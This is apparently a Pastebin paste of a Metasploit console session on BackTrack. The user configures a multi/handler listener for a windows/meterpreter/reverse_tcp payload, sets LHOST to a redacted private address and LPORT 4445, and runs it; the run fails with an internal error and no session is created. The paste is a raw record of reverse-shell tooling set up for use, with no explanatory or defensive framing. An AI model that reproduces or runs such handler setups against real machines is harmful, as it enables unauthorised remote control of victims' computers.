Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@bt:/opt/metasploit-3.5.0/apps/pro/msf3# ./msfconsole
- 888 888 d8b888
- 888 888 Y8P888
- 888 888 888
- 88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
- 888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
- 888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
- 888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
- 888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
- 888
- 888
- 888
- =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
- + -- --=[ 617 exploits - 307 auxiliary
- + -- --=[ 225 payloads - 28 encoders - 8 nops
- msf > use multi/handler
- msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
- payload => windows/meterpreter/reverse_tcp
- msf exploit(handler) > set LHOST 192.168.x.x
- LHOST => 192.168.x.x
- msf exploit(handler) > set LPORT 4445
- LPORT => 4445
- msf exploit(handler) > show options
- Module options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Payload options (windows/meterpreter/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC process yes Exit technique: seh, thread, process, none
- LHOST 192.168.x.x yes The listen address
- LPORT 4445 yes The listen port
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- msf exploit(handler) > exploit
- [-] Exploit failed: uninitialized constant Msf::Encoder::Type::PrintfUtil
- [*] Exploit completed, but no session was created.
- msf exploit(handler) >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement